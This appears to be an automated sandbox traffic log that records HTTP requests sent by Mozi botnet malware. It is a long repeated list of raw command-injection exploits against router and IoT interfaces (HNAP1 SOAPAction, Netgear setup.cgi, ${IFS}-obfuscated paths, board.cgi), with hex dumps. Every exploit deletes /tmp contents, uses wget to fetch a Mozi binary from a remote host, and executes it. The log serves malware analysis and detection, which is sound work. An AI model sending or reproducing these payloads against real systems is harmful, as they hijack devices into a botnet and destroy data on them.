Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 168.176.61.231:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 168.176.61.231:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 104.101.170.129:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 168.176.61.231:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 2.178.219.63:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 52.4.18.169:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 54.84.181.34:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 168.176.61.231:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
